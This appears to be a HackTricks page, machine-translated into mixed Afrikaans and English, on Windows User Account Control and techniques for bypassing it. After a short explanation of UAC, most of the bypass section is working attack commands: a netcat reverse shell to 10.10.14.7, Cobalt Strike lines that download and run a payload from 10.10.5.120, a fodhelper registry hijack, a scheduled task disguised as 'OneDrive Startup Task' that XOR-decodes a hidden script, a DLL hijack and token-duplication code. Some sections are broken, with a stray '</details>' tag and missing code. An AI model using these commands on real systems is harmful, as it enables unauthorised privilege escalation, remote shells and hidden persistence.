UAC - User Account Control

Tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Blaai deur die volledige HackTricks Training-katalogus vir die assesseringsroetes (ARTA/GRTA/AzRTA) en Linux Hacking Expert (LHE).

Ondersteun HackTricks

• Kyk na die intekenplanne!
• Sluit aan by die 💬 Discord-groep, die telegram-groep, volg @hacktricks_live op X/Twitter, of kyk na die LinkedIn-bladsy en YouTube-kanaal.
• Deel hacking tricks deur PRs in te stuur na die HackTricks en HackTricks Cloud github repos.

UAC

User Account Control (UAC) is ’n feature wat ’n bevestigingsprompt vir verhoogde aktiwiteite moontlik maak. Applications het verskillende integrity-vlakke, en ’n program met ’n hoë vlak kan take uitvoer wat die stelsel moontlik kan kompromitteer. When UAC geaktiveer is, applications en take loop altyd onder die security context van ’n nie-administrateur rekening tensy ’n administrator hierdie applications/take eksplisiet magtig om administrator-vlak toegang tot die system te hê om uit te voer. Dit is ’n gerief-funksie wat administrators beskerm teen onbedoelde changes, maar word nie as ’n security boundary beskou nie.

For more info about integrity levels:

Integrity Levels

When UAC in place is, word ’n administrator user twee tokens gegee: ’n standard user key, om gewone actions op gewone level uit te voer, en een met die admin privileges.

This page bespreek in groot detail hoe UAC work en sluit die logon process, user experience, en UAC architecture in. Administrators can security policies gebruik om te configureer how UAC werk spesifiek vir their organization op die local level (using secpol.msc), or configured and pushed out via Group Policy Objects (GPO) in an Active Directory domain environment. Die verskillende settings word in detail hier bespreek. There are 10 Group Policy settings that can be set for UAC. The following table provides additional detail:

Policies for installing software on Windows

Die local security policies (“secpol.msc” op meeste systems) is by default gekonfigureer om nie-admin users te verhinder om software installations uit te voer. This means that even if a non-admin user can download the installer for your software, they won’t be able to run it without an admin account.

Registry Keys to Force UAC to Ask for Elevation

As a standard user with no admin rights, you can make sure the “standard” account is gevra vir credentials deur UAC when it attempts to perform certain actions. This action would require modifying certain registry keys, for which you need admin permissions, unless there is a UAC bypass, or the attacker is already logged as admin.

Even if the user is in the Administrators group, these changes force the user to sy account credentials weer in te voer in order to perform administrative actions.

The only downside is that this approach needs UAC disabled to work, which is unlikely to be the case in production environments.

The registry keys and entries that you must change are the following (with their default values in parentheses):

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System:
• ConsentPromptBehaviorUser = 1 (3)
• ConsentPromptBehaviorAdmin = 1 (5)
• PromptOnSecureDesktop = 1 (1)

This can also be done manually through the Local Security Policy tool. Once changed, administrative operations prompt the user to re-enter their credentials.

Note

User Account Control is not a security boundary. Therefore, standard users cannot break out of their accounts and gain administrator rights without a local privilege escalation exploit.

Ask for ‘full computer access’ to a user

hostname | Set-Clipboard
Enable-PSRemoting -SkipNetworkProfileCheck -Force

cd C:\Users\hacedorderanas\Desktop
New-PSSession -Name "Case ID: 1527846" -ComputerName hostname
Enter-PSSession -ComputerName hostname

UAC Privileges

• Internet Explorer Protected Mode gebruik integrity checks om prosesse met hoë-integriteit-vlakke (soos web browsers) te keer om toegang te kry tot data met lae-integriteit-vlakke (soos die temporary Internet files folder). Dit word gedoen deur die browser met ’n low-integrity token te laat loop. Wanneer die browser probeer om toegang te kry tot data wat in die low-integrity zone gestoor is, kontroleer die operating system die integrity level van die proses en laat toegang dienooreenkomstig toe. Hierdie feature help om te voorkom dat remote code execution attacks toegang kry tot sensitiewe data op die system.
• Wanneer ’n user by Windows aanmeld, skep die system ’n access token wat ’n lys van die user’s privileges bevat. Privileges word gedefinieer as die kombinasie van ’n user’s rights en capabilities. Die token bevat ook ’n lys van die user’s credentials, wat credentials is wat gebruik word om die user by die computer en by resources op die network te authenticate.

Autoadminlogon

Om Windows te configure om outomaties ’n spesifieke user by startup aan te meld, stel die AutoAdminLogon registry key in. Dit is nuttig vir kiosk environments of vir testing purposes. Gebruik dit slegs op secure systems, aangesien dit die password in die registry blootstel.

Stel die volgende keys in met die Registry Editor of reg add:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon:
• AutoAdminLogon = 1
• DefaultUsername = username
• DefaultPassword = password

Om na normale logon behavior terug te keer, stel AutoAdminLogon op 0.

UAC bypass

Tip

Let daarop dat as jy grafiese access tot die victim het, UAC bypass reguit vorentoe is, aangesien jy eenvoudig op “Yes” kan klik wanneer die UAC prompt verskyn

Die UAC bypass is nodig in die volgende situasie: die UAC is geactiveer, jou process loop in ’n medium integrity context, en jou user behoort aan die administrators group.

Dit is belangrik om te noem dat dit veel moeiliker is om die UAC te bypass as dit op die hoogste security level (Always) is as wanneer dit op enige van die ander levels (Default) is.

UAC disabled

As UAC reeds disabled is (ConsentPromptBehaviorAdmin is 0) kan jy ’n reverse shell met admin privileges (high integrity level) execute met iets soos:

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UAC bypass with token duplication

• https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
• https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html

Baie Basiese UAC “bypass” (volledige lêerstelseltoegang)

As jy ’n shell het met ’n gebruiker wat in die Administrators-groep is, kan jy die C$ wat via SMB (lêerstelsel) gedeel word, plaaslik as ’n nuwe skyf mount en jy sal toegang hê tot alles binne die lêerstelsel (selfs die Administrator tuisgids).

Warning

Dit lyk of hierdie truuk nie meer werk nie

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

UAC-bypass met cobalt strike

Die Cobalt Strike-tegnieke sal net werk as UAC nie op sy maksimum sekuriteitsvlak ingestel is nie

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire en Metasploit het ook verskeie modules om die UAC te bypass.

KRBUACBypass

Dokumentasie en hulpmiddel by https://github.com/wh0amitz/KRBUACBypass

UAC bypass exploits

UACME wat ’n samestelling is van verskeie UAC bypass exploits. Let daarop dat jy UACME moet compile using visual studio or msbuild. Die samestelling sal verskeie uitvoerbare lêers skep (soos Source\Akagi\outout\x64\Debug\Akagi.exe) , jy sal moet weet watter een jy nodig het.
Jy moet versigtig wees omdat sommige bypasses some other programs sal promtp wat die gebruiker sal alert dat iets besig is om te gebeur.

UACME het die build version from which each technique started working. Jy kan soek vir ’n tegniek wat jou weergawes raak:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Ook, gebruik hierdie bladsy kry jy die Windows-vrystelling 1607 uit die build weergawes.

UAC Bypass – fodhelper.exe (Registry hijack)

Die trusted binary fodhelper.exe is auto-elevated op moderne Windows. Wanneer dit gelanseer word, vra dit die per-user registry pad hieronder navraag sonder om die DelegateExecute verb te valideer. Deur ’n opdrag daar te plaas, kan ’n Medium Integrity proses (gebruiker is in Administrators) ’n High Integrity proses laat spawn sonder ’n UAC prompt.

Registry pad wat deur fodhelper nagevra word:

HKCU\Software\Classes\ms-settings\Shell\Open\command

</details>
Notas:
- Werk wanneer die huidige gebruiker ’n lid van Administrators is en UAC-vlak standaard/lenient is (nie Always Notify met ekstra beperkings nie).
- Gebruik die `sysnative` path om ’n 64-bit PowerShell vanaf ’n 32-bit proses op 64-bit Windows te begin.
- Payload kan enige command wees (PowerShell, cmd, of ’n EXE path). Vermy UI-prompts vir stealth.

#### CurVer/extension hijack variant (HKCU only)

Onlangse samples wat `fodhelper.exe` abuse vermy `DelegateExecute` en eerder **die `ms-settings` ProgID redirect** via die per-user `CurVer` value. Die auto-elevated binary resolve steeds die handler onder `HKCU`, so geen admin token is nodig om die keys te plant nie:
```powershell
# Point ms-settings to a custom extension (.thm) and map that extension to our payload
New-Item -Path "HKCU:\Software\Classes\.thm\Shell\Open" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\.thm\Shell\Open\command" -Name "(default)" -Value "C:\\ProgramData\\rKXujm.exe" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings" -Name "CurVer" -Value ".thm" -Force

Start-Process "C:\\Windows\\System32\\fodhelper.exe"   # auto-elevates and runs rKXujm.exe

schtasks /create /sc hourly /tn "OneDrive Startup Task" /rl highest /tr "cmd /c powershell -w hidden $d=[IO.File]::ReadAllBytes('C:\ProgramData\VljE\zVJs.ps1');$k=[Text.Encoding]::UTF8.GetBytes('Q');for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$k[$i%$k.Length]};iex ([Text.Encoding]::UTF8.GetString($d))"

copy iscsiexe.dll %TEMP%\iscsiexe.dll
reg add "HKCU\Environment" /v Path /t REG_SZ /d "%TEMP%" /f
C:\Windows\System32\cmd.exe /c C:\Windows\SysWOW64\iscsicpl.exe

$pid = Invoke-RAiProcessRunOnce
$p = Get-Process -Id $pid
$t = Get-NtToken -Process $p
$id = New-NtTokenDuplicate -Token $t -ImpersonationLevel Identification
Invoke-NtToken $id -ImpersonationLevel Identification { Get-NtDirectory "\??" | Out-Null }
$auth = Get-NtTokenId -Authentication -Token $id
New-NtSymbolicLink "\Sessions\0\DosDevices/$auth/C:" "\??\\C:\\Users\\attacker\\loot"